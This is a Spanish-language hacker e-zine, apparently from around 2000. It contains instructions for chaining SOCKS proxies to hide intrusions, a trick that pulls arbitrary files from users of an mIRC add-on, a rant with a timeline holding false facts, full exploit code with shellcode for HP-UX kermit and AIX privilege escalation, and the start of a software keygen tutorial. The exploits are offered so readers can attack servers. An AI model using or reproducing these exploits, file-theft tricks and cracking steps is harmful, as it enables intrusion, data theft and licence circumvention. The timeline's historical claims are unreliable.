[z3r0@acidklan.org] *** ******************************************************************************** ******************************************************************************** ******************************************************************************** [7.1]-------------------[Spo0f mediante s0ck3ts]----------------------[7.1] __ .__ .__ ___. ____/ |________| | | | _____ \_ |__ ______ _/ ___\ __\_ __ \ | | | \__ \ | __ \ / ___/ \ \___| | | | \/ |__ | |__/ __ \| \_\ \\___ \ \___ >__| |__| |____/ |____(____ /___ /____ > \/ \/ \/ \/ ü±üÜüÜüÜüÜüÜüÜüÜüÜüÜüÜüÜ IÜü TaKe ThE FaWkInG CtRl Üü düÜüÜüÜüÜüÜüÜüÜüÜüÜüÜüÜüÜüë îïIîïîïIîïîïIîï d·[x]--[Tema(1)|-|--[[.Spo0f mediante s0ck3ts.]] d·[x]--[Tema(²)|-|--[[.Vulnerabilidad en mIRC ADD-On.]] îïIîïîïIîïîïIîï #----------[Archivos Anexos]--[1]--redirect.exe(103Kb)--------# Hola a todos los ke estan leyendo nuestra e-zine, me da mucho gusto que haya gente ke aún esté interesada en todos estos temas underground y que mejor.. que ser todos de la misma raza. Yo soy nuevo en el Equípo, y pues.. vamos a hecharle todas las ganas del mundo, para fomentar todos estos rollos ke a todos nos interesan >;) [intro(t1)]: îïìîïìîïìîïìîïìîïìîïìîïìîïìîïìîïìîïìîïì Hay veces que cuando uno quiere hacer "travesuras", tiene miedo de que algún archivo se kede con el registro de nuestra mákina en la mákina víctima. Pero hay muchos programas los kuales se enkargan de realizar esa taréa con unos cuántos pasos. Hay diferentes versiones de programas, y para distintos sistemas Operativos (llámesele Linux, OpenBSD, w|ndr0ps, etc). En el que me voy a enfocar va a hacer en el Redirektor para Windows98c xD. PROS: * Te kita un gran peso de encima al estar todo nervioso kuando te logeas en algun server >XD >;) * Lógras conectarte a la mákina, después de haberte conectado remotamente a "X" Número de proxys que pusiste anteriormente. Esto quiere decir que seria muyyyyyy problematico dar con tu verdadera identidad en los servers >:P (y más si te agarras varios proxys de otros países. xDDDDD) CONTRAS: Este método no es 100% Anónimo. puesto ke en los proxy servers, siempre se keda algun "indicio" de tu entrada (fuck!) >:(. Instrucciones de uso, y ya al granO! xD Paso N° [1]: Se ejekuta el archivo anexo a este dok' xD (para los pendejos, me refiero al archivo redirektor.exe xDD) Paso N° [2]: En el main del programa, vamos a ver las siguientes opciónes: - Local server port [12288] - [OPEN] - [CLOSE] - [Cuadro de edición de texto] (para escribir los proxys) - Finger target host:[(address. de la mákina)] - Port: [23] Paso N° [3]: En el campo de texto, como lo comente hace un momento, vamos a tener ke introducir las direcciónes de los proxys a los kuales keremos conectarnos antes de llegar a nuestra mákina destino. Nota[1]: Mientras mas direcciones proxys, pongamos en el kampo, más dificil será nuestro rastreo, y como habia dicho, si encontramos proxys de diferentes partes del mundo.. pues a toda madre. xDD Nota[2]: Los proxys awebo deben de ser por SOCKS 5, oséase puerto 1080 Paso N° [4]: Ya que hayamos escrito los proxys en el campo de texto, le damos un click en el boton ke dice [OPEN], y veriamos algo como lo siguiente: - Opening server socket. Paso N° [5]: Al momento ke nosotros le demos click al botón, abrimos el puerto número "12288" de nuestra mákina lokal. Paso N° [6]: Abrimos nuestro cliente, (gralmente el Telnet de winshit xD) para posteriormente conectarnos a nuestra ip, en el puerto 12288. [para los pendejos: telnet 148.xxx.xxx.xxx 12288] xDDD Paso N° [7]: Ésto tendrá como efecto, que nuestro cliente telnet, se conecte al primero proxy de la lista - Opening server socket. - Incoming connection! Let the show begin. - Connecting to direccion.del.proxy:1080... Paso N° [8]: Posteriormente se conectará asi mismo, con el segundo proxy de la lista, y así sucesivamente con todos los proxys restantes. Paso N° [9]: Por último, cuando haya finalizado la conexion de los proxys, se conectará a la mákina víctima, que nosotros hayamos insertado en los campos de texto, por el determinado puerto ke nosotros le pusimos, y veriamos ya el logon de la mákina víctima en nuestro cliente. Redhat 7.0 (Peleonnor) login: y lísto!, estamos en la mákina sin pedos.. xDDD hehe. [7.2]---------------[Vulnerabilidad en mIRC Add-on]-------------------[7.2] _____________________________________________________________d | | íïîíïî| Bueno, esta introduccion va a ser explícita, por ke la neta | 1ntr0:| tengo un chingo de sueño.. y son las 3:00am, y tengo ke | íïîíïî| trabajar. heh, bien dicen que las mejores ideas, son las | | que se piensan en la noche No? pero Bueno. seré breve. | | | |_____________________________________________________________| |_________________________________________________________I * Esta parte trata acerca de una Vulnerabilidad que encontré (digo la "encontré", por ke no he sabido de alguien ke ya lo supiera, y si alguien la encontró antes ke yo, pues me vale madre. jeje. >:P~) pero bueno, esto consiste en una cosa muyyyyy pero muyu "lógika" y pues ayudada por un... como se le podría llamar.. un. "fállo" en el código del add-on. No se le puede llamar "exploit" ni nada por el estilo, es solamente poner un poco de "cerebro" para ver la forma hehe xD. hmta ya!.. la estoy ahciendo mucho al "wey" (la neta y ni coordino mis pensamientos por la weba xD), Esta vulnerabilidad simplemente afecta a los usuarios ke utilizan el script SFind, y da acceso a cualquer archivo de la pc del usuario. Se entra al kanal... se cheka ke el user este usando ese add-on, y solamente se teclea en el kanal: !][^{Nick_de_Lamer}^][ c:\path\del\archivo.exe (.pwd o lo ke sea) y es todo. El usuario te manda el archivo ke pusiste, es como digo, es una cosa muy "tonta" pero pues las veces ke lo probé, si me sirvió. No estoy muy seguro si TODAS las versiones del sfind funcionen así, o simplemente esperar a ke el koder, parchee ese error. en fin. como les digo, si les sirve de algo, pues va.. si no pus igual xD hehe. Notas finales: Bueno, pues espero ke les sirva de ayuda este artículo. Para el ke ya se sepa el truco, pues chido.., y pues para el ke no, también xDD. Perdón si no fuí muy explikativo en el texto, pero no soy muy bueno en estos desmadres.. los pongo a como yo los entiendo. pero pues ojalá y le entiendan, si no, pues hechenle cabeza hehe. Me despido con un gran saludo y un caluroso abrazo, de parte de su amigo "El Cóntrol" xDDDDDD (ahh ke pinche MIBXXX xDDDD haha) Nota: Ah. por cierto. un gran saludo a mi amiga Cherry sh0utz: hkm, Dreamer, narKo, ^InX^, MIBXXX, Rebel, Java, z3r0, JimBbo, Havock, loco_mx, y a los demás ke faltan xD - pseeya - (ctrl@acidklan.org) Ahora si me lanzo a jetear.. __EOF__ xDDDDDDDDD [8]--------------------[Avances Tecnologicos ???]-----------------------[8] ================================= ""Avances Tecnologicos?? o enriquecimiento de pendejos (no agraviando a Bill Puentes) By $@4nthraX^ ================================= Te has dado cuenta que con odiar a Bill Gates no ganas nada???? Tu me diras callate pendejo, si gano algo, desquitar mi furia contra el pendejo con mas varo del pinche monopolizado mundo..... pero chale te has dado cuenta que tu escuela, tu papa, tu mama, la empresa donde trabajas y demas chingaderas cada vez mas contribuyen a que este pedazo de cagada se llene mas de varo, con el dinero que tiene tragaria africa asia y europa por mas de dos meses te das cuenta que el pendejo tiene el poder para apoderarse del mundo...... Pero en finnnnn podemos hacer algo........ Claro que si no comprar pendejos programas de micrososft, llamese office, windows 9.x o 2000, etc. Contribuir al avance de programas y software libre, etc. Ademas podemos concientizar a las personas que viven cerca de nosotros y a las que conocemos para impulsar este tipo de software, pero te has puesto a pensar como ha avanzado la humanidad en los ultimos aos en lo que a inform tica se refiere????? Pues bueno remontemonos a el ao 3000 A.C., en asia una primera forma de abaco, en el ao 876 ya pasandonos a la a despues de la era cristiana se da la implementaci¢n del 0 en la india, en 1620 se inventa la regla de calculo 1642 pascal disea la primera calculadora, 1694 Leibniz construye a una maquina de calcular llamado "passcalline". 1812 con Ludd surge el luddismo que impulsaba a los trabajadores a destruir las maquinas y construir sus propias maquinas para acabar con la esclavitud, inicia la revolucion industrial. 1832 Charles Babbage disea la primera computadora, pero jamas la puede construir. 1890 herman hollerith disea la primera maquina de tabulacion con tarjetas perforadas funda IBM. 1897 dos inventores disean una maquina para calcular de modo binario. 1937 se construye la ENIAC. 1938 Konrad Zuze crea la primera computadora que emplea codigo binario de aqui Hp se crea por william Hewlett y David Packard en un garage. Stibitz crea la primera terminal por 400 redes telefonicas. 1944 Un ingeniero de Harvard crea la MARK 1. 1946 ingenieros de la Universidad de Penssylvania presentan la ENIAC. 1947 primer transistor. 1949 Mauchly desarrolla el "short code" lenguaje de programacion de alto nivel, 1951 Mauchly crea la UNIVAC 1. 1955 Narinder Kapany desarrolla la fibra optica. 1956 IBM desarrolla el disco duro, desarrollan el programa FORTRAN. 1958 Grace murray Hopper y Charles Philips inventan COBOL. 1959 xerox da al mundo la primera fotocopiadora. 1963 Douglas Engelbert desarrolla el primer mouse. La asociacion americana de estandares adopta el codigo ascii como su norma de transferencia y codificacion de datos.1965 DEC crea la primera mini computadora. 1968 se crea INTEL. 1970 es introducido el disco flexible, y ademas se crea el sistema UNIX.Niclus Wirth crea PASCAL. 1972 Tomlinson inventa el correo electronico. 1975 se comienzan a mercadear las pantallas de cristal liquido LCD. En 1975 es cuando empieza la sociedad no legal de bill gates MICROSOFT que alcanza ventas de $16.000. 1977 Steve Jobs crea apple. IBM presenta su primera maquina comercial con DOS. 1982 se comienza a utilizar el CD. 1983 se presenta LISA la primera computadora que emplea una interfaz grafica para el usuario y un raton. 1984 el numero de suaurios de internet se eleva a 1000 se introducen os modems de 2400 baudios. 1985 Es fundada la chingadera de AOL, microsoft crea Windows 1.0 para la pc de IBM, John Sculley firma un acuerdo confidencial para que windows pueda usar algunas cosas de la interfaz de MAC. El nintendo llega a EUA. 1988 Microsoft lanza windows 2.03 con las primeras ventanas........ Apple demanda a Micosoft por usar aspectos no solo en la interfaz sino en todo el sistema. El jurado falla en favor a Gates, Jobs se molesta y suelta el internet Worm. 1989 se inventa la world wide Web (www). Xerox demanda a apple por usar aspectos de sus sistemas en las computadoras lisa y macintosh. Surge la HDTV. 1990 intel prsenta el chip i486. Aqui es donde el avance de la puta empresa a la que mas odio y todos odiamos comienza su auge y sus ventas alcanzan $1000 millones de dolares windows saca su version 3.0. 1993 intel lanza su chip pentium. 1995 mocosoft presenta win 95. 1997 Se comienza el uso del DVD. El grupo de Hacking for girlies entra a el server the new york times y lo interrumpe por nueve horas en 1998, tambien en este ao se presentan las iMac. 1999 aparece uno de los principales y mas chingones OS es programado por linuss tolvards el sistema es denominado LINUX. AOL adquiere netscape, yahoo adquiere geocities. 2000 se crea el OS Acid Lunix 1.0 programado por el equipo creativo del acid klan inspirado en el prog WINLINUX XD. Bueno pues despues de este pinche chorizote nos damos cuenta por lo que el copion e idiota de gates ah tenio que hacer pero tambien el seor jobs no se ha hido limpio ya que tambien copio la interfaz de usuario y todo del sistema de xerox y alguna vez lo habias juzgado por esooo noooo....???? verdad jajaja y esta vez si perdio a diferencia de gates que todo lo hizo con permiso como lo explique en la cronica por eso la puse pero en fin ya no contribuyamos a que este maldito hijo de p... se siga haciendo rico. Impulsa el software libre no solo en mexico sino en todo el mundo. Bueno me despido de ustedes esperando que les llegue esto a la cabeza y tomen conciencia. FROM $@4nthraX^ of Acid_Klan. FucK ThE LammerZ AnD HacK ThE WorlD. $$$$$$$$$$$$$$$$$$$$$$linux6.2kernel2.2.13$$$$$$$$$$$$$text.mime$$$$$$$$$$$ [9]-----------------[Hacking a los nuevos servidores]-------------------[9] New Servers,New Exploits. Me imagino que ya todos han escuchado hablar de que las payasas compaIias han sacado sus new server's y que estan orgullosos de la estabilidad que estos sistemas han alcanzado que seran los mejores de todos los tiempos y juran y perjuran que no tienen bugs y que ningun hacker podra contra estas maquinas jajaja pues este choro es viejo conocido mas de uno lo hemos escuchado y aqui vamos a proporcionar algunas cuantas formas para hackear estos new servers que disen que hasta al BaIo van jejejjejee y que segun sus creadores son Anti-Todo,y que a final de cuentas no lo son cosas comun de las Grandes CompaIias Empesaremos por el nuevo servidor de HP Este es el Choro que sale en la pagina de HP cuando entras a ver los SuperDomes ------------> ]||||HP_Super-Dome|||||[ <----------------- --------------------------------------------------------------------------- |] Info Comercial del SuperDome (Ingles) [|  utility technologies and pricing (ideal for service providers with unpredictable and rapidly changing needs)  leadership performance (industry-leading system benchmark results)  high availability (more in-the-box availability than ever plus inclusion in HP's unmatched 5nines: 5minutes high-availability program)  hardware and software partitioning For future needs, HP Superdome is designed for board upgrades to itanium for multi-OS environments. You can choose from three configurations of technologies and services to create a Superdome solution that's business-enabled from day one. --------------------------------------------------------------------------- Cualquier Duda o Informacion sobre que HeLl's es el Superdome pueden consultarlo en http://www.unixservers.hp.com/highend/superdome/index.html Mas Choro CLARO CON GUSTO ---------------------------------------------------------------------------- [ Descripcion Tecnica y algo de informacion comercial (Ingles)] superdome configurations at-a-glance foundation configuration HP recognizes that building the right infrastructure the first time dramatically reduces problems and speeds time to production, so all Superdome solutions will include the Foundation Configuration as the optimal base for customer solutions. Build it right the first time with: closed-loop solution management detailed architecture design pre-integration and testing needs-based training critical systems configuration Critical Systems focuses on the system and the people and processes that affect its stability and reliability, and proactively monitors operations to prevent issues from becoming problems. This configuration includes everything in the Foundation Configuration, plus: assigned support engineers who manage the solution operations to your specific needs understanding of the state of the IT infrastructure and processes in relation to the deployment of a mission-critical service proactive availability management with remote monitoring 6-hour call-to-repair commitment business continuity configuration The Business Continuity Configuration delivers a superior package of services unrivaled in the industry. It offers the fastest reactive services and adds the highest level of proactive support to help customers avoid downtime. Business Continuity delivers a different way to approach availability planning. It is a partnership between hp and the customer that creates a plan to proactively address all of the elements in the IT environment that affect business availability. HP team participation on your IT team 4-hour call-to-resolution commitment for hardware and software "high-touch" level of experience, including monthly reviews and an assigned response center engineer highest priority, immediate access to trained specialists HP R&D; mobilization 7 days/week superdome features at-a-glance availability online addition and replacement of cells (CPU/memory) and PCI I/O cards online replacement of fans and power supplies 6 or 12 fans and 4, 6, or 12 power supplies; N+1 included error checking and correction on all CPU and memory paths parity-protected I/O data paths dual power source hardware and 100% software isolation between partitions software fault isolation support for MC/ServiceGuard and MC/LockManager in a Superdome cluster capacity single node: 16, 32, or 64-way 550MHz, 4-way superscalar PA-8600 CPUs with 1.5MB on-chip cache per CPU partitioning capability (1-16 nPartitions) for hardware and complete software isolation, multiple operating environments, and optimized systems utilization. up to 128GB memory per cabinet (512MB DIMMs) peak 16GB/s memory controller bandwidth; 64GB/s per 64-way cabinet 33MHz (2x) or 66MHz (4x) industry-standard 64-bit PCI 16 200MB/s (33MHz PCI) or 400MB/s (66MHz PCI) I/O channels per cabinet 48 to 192 (with I/O expansion cabinet) hot-swap PCI I/O slots storage options including JBOD, Fibre Channel, or HP SureStore e disk arrays; HP AutoRAID, HP Fibre-Channel-to-SCSI Multiplexer, and tape drives and libraries connectivity core I/O including 10/100Base-T LAN partitions for USB and RS-232 support for Fibre Channel, Token Ring, 1000Base-SX, 1000Base-TX, and FDDI Nokia Wireless Application Protocol (WAP) server support security host-based intrusion detection IPSec end-to-end virtual private network capability manageability Support Management Station Partition Manager console for Guardian Service Processor (GSP) integrated HP WebQoS peak integrated HP ServiceControl manager investment protection and flexibility designed for future upgrades to multiple generations of PA-RISC and the ItaniumT processor family unlimited license for Internet HP-UX 11i operating environment; options to upgrade to: enterprise or mission-critical HP-UX future support for Windows and Linux choice of integrated web server options: industry standard for faster, more scalable performance e-speak open software platform for developing and deploying e-services ----------------------------[ Primera Exploit ]------------------------------ /* Title: HP-UX kermit */ /* Tested under: HP-UX 11.0 */ /* By: K2 */ /* Use: gcc -o kermit kermit.c ; ./kermit */ /* (more hp to come :) */ /* Distribuido por Ac|d_z3r0 */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #define BUF_LENGTH 12000 #define STACK_OFFSET 13400 #define EXTRA 11500 #define HPPA_NOP 0x0b390280 u_char hppa_shellcode[] = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"; u_long get_sp(void) { __asm__("copy %sp,%ret0 \n"); } int main(int argc, char *argv[]) { char buf[BUF_LENGTH + 8]; unsigned long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(hppa_shellcode),dso=STACK_OFFSET,xtra=EXTRA; if(argc > 1) dso+=atoi(argv[1]); if(argc > 2) xtra+=atoi(argv[2]); long_p = (u_long *) buf ; for (i = 0; i < (BUF_LENGTH - code_length - xtra) / sizeof(u_long); i++) *long_p++ = HPPA_NOP; char_p = (u_char *) long_p; char_p--; for (i = 0; i < code_length; i++) *char_p++ = hppa_shellcode[i]; targ_addr = get_sp() - dso; for (i = 0; i < ((xtra /4)); i++) { *char_p++ =(targ_addr>>24)&255; *char_p++ =(targ_addr>>16)&255; *char_p++ =(targ_addr>>8)&255; *char_p++ =(targ_addr)&255; } printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",targ_addr,strlen(buf),xtra,dso); execl("./k","k","-Y", buf, (char *) 0); /* make a symlink or something in /tmp */ perror("execl failed"); return(-1); } [|][Fin][|] --------------------------------------------------------------------------------------- -[-0j0-]- Cualquier exploit que afecte al sitema HP-UX 11 tambien afectara al super dome debido a que este el sistema operativo precargado de este servidor aunque en el paquet tambien viene Linux RedHat 7.0 es poco comun que lo lleguen a instalar,aunque he encontrado raros casos que un superdome tiene NT xDDDDD,de todos modos esto es valido debido a que el superdome fue creado para ser multiplataformico y se espera que en futuras distribuciones de este Server venga instalado con RedHat debido a la alianza que tienen esto habla de que podria ser que las Grandes Empresas adopten LiNuX {Noticia ya algo vieja} por lo general estos servers estan conectados a routers,y a WebConsoles(HP),tambien suelen conectarse a Netservers(HP), o en ExtraIas ocasiones a NT'Servers la manera de hackearlos es muy variada y en la actualidad contamos con pocos exploit's para el HP-UX y mas aun para este servidor en si,si puedes contribuir escribeme y sera publicado y ayudaras a la comunidad a chingar mas servidores xDDD,y nuevesitos asi que sigamos ------------------------------------------------------------------------------------- -----------> ]||||IBM pSeries 680|||||[ <------------- ------------------------------------------------------------------------------------- Ahora Vallamos con la otra compaIia una de mis favoritas xDDD,IBM Elegi los UNIX Servers IBM a mi gusto es una gran compaIia que provee algunas de las mejores soluciones en el mercado la verdad es que me dieron lana xDDD,no no es cierto lo que pasa es que ando pensando comprarme un IBM Server xDDDD,entrando en materia en si lo que me agrada de IBM es que estan apoyando a LiNuX y he usado algunos de sus new servers y me han convencido aunque muchos tienen opiniones distintas sinceramente ......... Las Respeto asi que entremos en materia porque mucho bla bla y nada de accion Si entras a la pagina de IBM este sera el Choro -------------------------------------------------------------------------------------- |] Descripcion Comercial (Ingles) [| IBM pSeries 680 Outstanding high-end system with industry-leading UNIX commercial performance. 4- to 24-way 64-bit SMP server with state-of-the-art copper and silicon-on-insulator technologies. Up to 96GB of memory, 16MB L2 cache, 56 PCI slots, 48 hot-swappable disk bays, and 873.6GB of internal disk for exceptional range of capacity. Superior reliability and availability features. Unique Capacity Upgrade on Demand offering for rapid vertical growth. IBM pSeries 680 at a glance Machine Type 7017 7017 7017 7017 Microprocessor Type RS64 IV RS64 IV RS64 IV RS64 IV Processors per system 4 12 18 24 Clock rates available 600 MHz 600 MHz 600 MHz 600 MHz Memory System(min/max) 4GB/96GB* 4GB/96GB* 4GB/96GB* 4GB/96GB* L2 Cache 16MB** 16MB** 16MB** 16MB** Capacity Slots available 53 53 53 53 Disk/Media bays 48/8 48/8 48/8 48/8 Internal disk(min/max) 9.1GB/ 873.6GB 9.1GB/ 873.6GB 9.1GB/ 873.6GB 9.1GB/ 873.6GB Benchmarks SPECint_base_ rate2000 -- -- -- -- SPECfp_base_ rate2000 -- -- -- -- Relative OLTP performance 149.0 416.0 583.3 736.0 * shared memory **per processor ------------------------------------------------------------------------------------- Mas informacion en http://www.ibm.com/servers/eserver/pseries/680.html Creanmelo ay todavia mucho mas choro esperandolos en esa pagina xDDD y para que no se queden con las GANAS MAS INFO DE ESTE SERVER ------------------------------------------------------------------------------------- |] Descripcion Tecnica (Ingles) [| Standard configuration Microprocessor: four or six-way 600 MHz RS64 IV RAM (memory): 4GB Level 1 (L1) cache: 128KB data/128KB instruction Memory slots: 16 Level 2 (L2) cache: 16MB per processor Memory bus width: Quad 512-bit PCI bus width: 32- and 64-bit Expansion slots: 14 PCI (11 available) Media bays: Two (one available) Disk drive bays: 12 (11 available) Internal disk drive: 9.1GB Ultra SCSI (hot-swappable) Ports: One parallel, two serial, one keyboard and one mouse Standard features CD-ROM drive, service processor, 1.44MB 3.5-inch diskette drive, two Ultra SCSI PCI adapters Operating system AIX Version 4.3.3 (unlimited user license) System expansion SMP configurations: Up to four six-way processor books RAM: Up to 96GB PCI expansion slots: Up to 56 Internal disk bays: Up to 48 (hot-swappable) Internal disk storage: Up to 873.6GB Internal media bays: Up to eight Attachment: SP System Attachment feature for use as SP-attached server System dimensions CEC enclosure: 62" H x 22.3" W x 47.3" D (1577 mm x 565 mm x 1201 mm); 880 lbs (400 Kg) I/O rack (36U): 71" H x 25.4" W x 45.2" D (1804 mm x 644 mm x 1147 mm); 535 lbs (244 Kg) I/O rack (42U): 79.3" H x 25.4" W x 45.2" D (2015 mm x 644 mm x 1147 mm); 575 lbs (261 Kg) Warranty On-site 24x7 for one year (limited) at no additional cost TPC-C Published Results Model Proc. MHz L1 Cache (KB) L2 Cache (MB) tpmC $/tpmC Database AIX Ver. Availablility Date p680 RS64 IV/24 600 128/128 16 220, 807.27 43.30 Oracle8i 8.1.7 4.3.3 4/13/00 ------------------------------------------------------------------------------------- En este momento todos los IBM Serie P estan considerados High-End aunque existen otros deside este modelo por que es el que anunciaban en IBM xDDD --------------------------------[ Primera Exploit ]---------------------------------- [|][Inicio][|] #!/usr/bin/perl # * Author: # # dvorak (dvorak@synnergy.net) # Distribuido por Ac|d_z3r0 {www.acidklan.org} # # Our route: # 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228 # 0x10015228: loads r12 with a value from our buffera # loads r0 with the next address to jump to (0x1001038c) # and sets r2 to another place in our buffer # 0x1001038c: sets r3 to a place in the buffer (finally!) # sets r0 to next address to jump to (0xd00406d4, system(...)) # # The flow with registers is thus: # r2 = 0x14(r1) # r12 = 0x110(r2) # r0 = 0x0(r12) # r2 = 0x4(r12) # r3 = 0x40(r1) # r12 = 0x3c(r2) # 0x14(r1) = r12 this is the plave where TOC is stored but it doesn't seem # to matter # r0 = 0x0(12) # r2 = 0x04(r12) # and of we go... # # We set: # $buf = the buffer on the stack $buf[0] is the first byte in the buffer # but we will count offsets from 4 (the first 4 bytes is just "CEL " is # doesn't matter, only the space does (it makes sure the rest of the buffer) # stays the way it is and isn't converted into lower case # # Offsets: # 0x000: 0x1001038c # 0x004: buf[0] # 0x008: this is the place where the address of the systemcall is taken from # 0xd00406d4 in our case# 0x00c: thi is the address where r2 is loaded # from just before the call to # system(..) we set it to the TOC in our program we don't know if it # matters and if the TOC is constant between hosts # 0x03c: buf[08] # 0x110: buf[0] # 0x204: return address (0x10010150) # 0x210: buf[0] # 0x23c: buf[0x240] # 0x240: "/tmp/sh" or whatever command you want to execute # r1 points to buf[0x1fc] # # I assume the positions in the libraries/program are fixed and that TOC # either doesn't matter or is fixed to please enlighten me on these topics. # # 0x10010150: # l r2, 0x14(r1) # b 0x10015228 # 0x10015228: # l r12, 0x110(r2) # st r12, 0x14(r1) # l r0, 0x0(r12) # l r2, 0x4(r12) # b r0 # 0x1001038c: # l r3, 0x40(r1) # b 0x100136f8 # 0x100136f8: # l r12, 0x3c(r2) # st r12, 0x14(r1) # l r0, 0x0(r12) # l r2, 0x04(r12) $bufstart = 0x2ff22724; [2000]# this is our first guess $nop = "\xde\xad\xca\xfe"; $buf = "CEL "; $buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of [2000]# 'borrowed' code $buf .= pack ("N", $bufstart); # 4 $buf .= "\xd0\x04\x06\xd4"; # 8 system call.. $buf .= "\xf0\x14\x63\x5c"; # c TOC $offset = 0x10; while ($offset < 0x3c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x008); $offset += 4; while ($offset < 0x110) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x204) { $offset += 4; $buf .= $nop; } $buf .= "\x10\x01\x01\x50"; $offset += 4; while ($offset < 0x210) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x23c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x240); $offset += 4; while ($offset < 0x240) { $offset += 4; $buf .= $nop; } # this is the command that will be run through system $buf .= "/tmp/sh"; $buf .= "\n"; # offcourse you should change this . # open F, "| nc -v -v -n 192.168.2.12 21"; open F, "| od -tx1"; printf F $buf; close F; # EOF [|][Fin][|] -----------------------------[ Segunda Exploit ]--------------------------------- [|][Inicio][|] /* Distribuido por Ac|d_z3r0 {www.acidklan.org} If the program gives you 'Segmentation fault' or 'Illegal instruction', then try at least the following arguments:(string length,offset,kludge1,kludge2) 78 40 1 1 78 40 1 0 78 40 0 0 78 40 0 1 Compile with: cc -g test.c try: ./a.out 78 40 1 1 ./a.out 78 40 0 0 ./a.out 78 40 0 1 ./a.out 78 40 0 0 */ #include <stdio.h> #include <stdlib.h> void sh2() { int junk[0x100]; int s[2]; int toc; int ctr; junk[0x100]=0x11; toc=0xf0192c48; ctr=0xd0024c0c; s[0]=0x2f62696e; s[1]=0x2f736800; execv(&s,0); } void buggy(char *s) { char a[4]; unsigned int junk[150]; strcpy(a,s); puts("Over"); if(junk[20]) puts("P"); } main(int argc,char **argv) { unsigned int junk[300]; unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x30632c48 , 0x90610440 , 0x3c60d002 , 0x30634c0c , 0x90610444 , 0x3c602f62 , 0x3063696e , 0x90610438 , 0x3c602f73 , 0x30636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; unsigned int buf[600]; unsigned int i,nop,mn; int max; unsigned int toc; unsigned int eco; unsigned int *pt; int carry1=1; int carry2=1; pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; if (argv[3]) carry1=atoi(argv[3]); if (argv[4]) carry2=atoi(argv[4]); max=atoi(argv[1]); if(max==0) max=78; mn=40; if(argv[2]) mn=atoi(argv[2]); *((unsigned short *)code +9)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code +7)=carry1+(unsigned short) ((toc >> 16) & 0x0000ffff); *((unsigned short *)code +15)=(unsigned short) (eco & 0x0000ffff); *((unsigned short *)code +13)=carry2+(unsigned short) ((eco >> 16) & 0x0000ffff); puts("Test AIX!"); puts("Discovered and coded by G.G."); printf("TOC:%0x,CTR:%0x\n",toc,eco); junk[50]=1; for(nop=0;nop<mn;nop++) buf[nop]=0x4ffffb82;/*nop*/ strcpy((char*)&buf[nop],(char*)&code); i=nop+strlen(code)/4-1; while(i++<max) { buf[i]=(unsigned) &buf[nop]; } buf[i]=0; for(i=0;i<nop;i++) buf[i]=(unsigned)&buf[nop]; for(i=0;i<300;i++) junk[i]=(unsigned)&buf[nop]; puts("Start...");/*Here we go*/ i=execl("/bin/host","host",(char*)&buf,0); puts((char*)buf); printf("%p\n",&buf[nop]); if (!junk[50]) puts("s"); printf("OK\n"); } [|][Fin][|] --------------------------------------------------------------------------------- -[-0j0-]- Cualquier Exploit que afecte al AIX 4.3.3 afectara a los servers Serie P Al igual que HP ellos estan invertiendo una gran cantidad de dinero en Linux para poder implementar este Software en sus servidores como una alternativa para el desarrollo de nuevas tecnologias,de hecho IBM tiene una gran cantidad de programas para el desarrollo de paginas,programas,web servers, y otra cantidad de "cosas" corriendo sobre linux asi que pronto podremos hackear estos servidores xDDD aunque se preve que mejoren Kerberos y otros multiples procesos la mayoria de los IBM servers tienen LiNuX al menos en un disco o en uno de los discos de algun Disk Array (Areglo de Discos) debido a la capacidad de Bootear desde cualquier disco del areglo asi que no estaria de mas probar los exploits de linux contra un IBM server ************************************************************************* ************************************************************************* *** Todos los Exploits aqui publicados fueron provados comprovando su *** *** Efectividad los exploit's estos exploit's son proporcionados para *** *** Fines educativos, de ante mano agradesco a la gente que me los *** *** proporciono y me dejo redistribuirlos *** *** *** *** Cualquier duda a z3r0@acidklan.org *** *** [Ac|d_z3r0] *** ************************************************************************* ************************************************************************* [10]--------------------[Tutorial para un Keygen]----------------------[10] /*\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/*\ \*/ \*/ /*\ KeY del W3filer v1.13 (32-bit). /*\ \*/ ------------------------------- \*/ /*\ loco_mx /*\ \*/ Gracias a AnArKhY \*/ /*\ /*\ \*/ \*/ /*\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/*\ \*/ \*/ /*\ mail: locomx@acidklan.org /*\ \*/ \*/ /*\ web: http://www.acidklan.org /*\ \*/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\*/ Bueno antes que nada, les digo que esta informacion es solo con el proposito de difundir conosimientos y no para andar molestando a la gente. Hacer y distribuir Cracks y Keys NO ES DELITO EN NINGUN PAIS DEL MUNDO. Te recordamos ke estos cracks son solo para ke los pruebes en programas de los cuales tengas la licencia de usuario final, si los usas para desproteger programas de los cuales no tegas la licencia estaras incurriendo en un delito que es perseguido internacionalmente |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| ºººººººººººººººººººººººººººººººººººººººººººººººººººººººººººººººººººººººº Para esto necesitas un debuger, en este caso yo estoy usando el SoftIce 3.24, y yo creo que esta vez lo aremos en Turbo Pascal. Abre el w3filer, una ventana se abre y pide el registro, y se nota que el programa tiene algun tipo de numero de serie (el mio es: 873977046). Detente 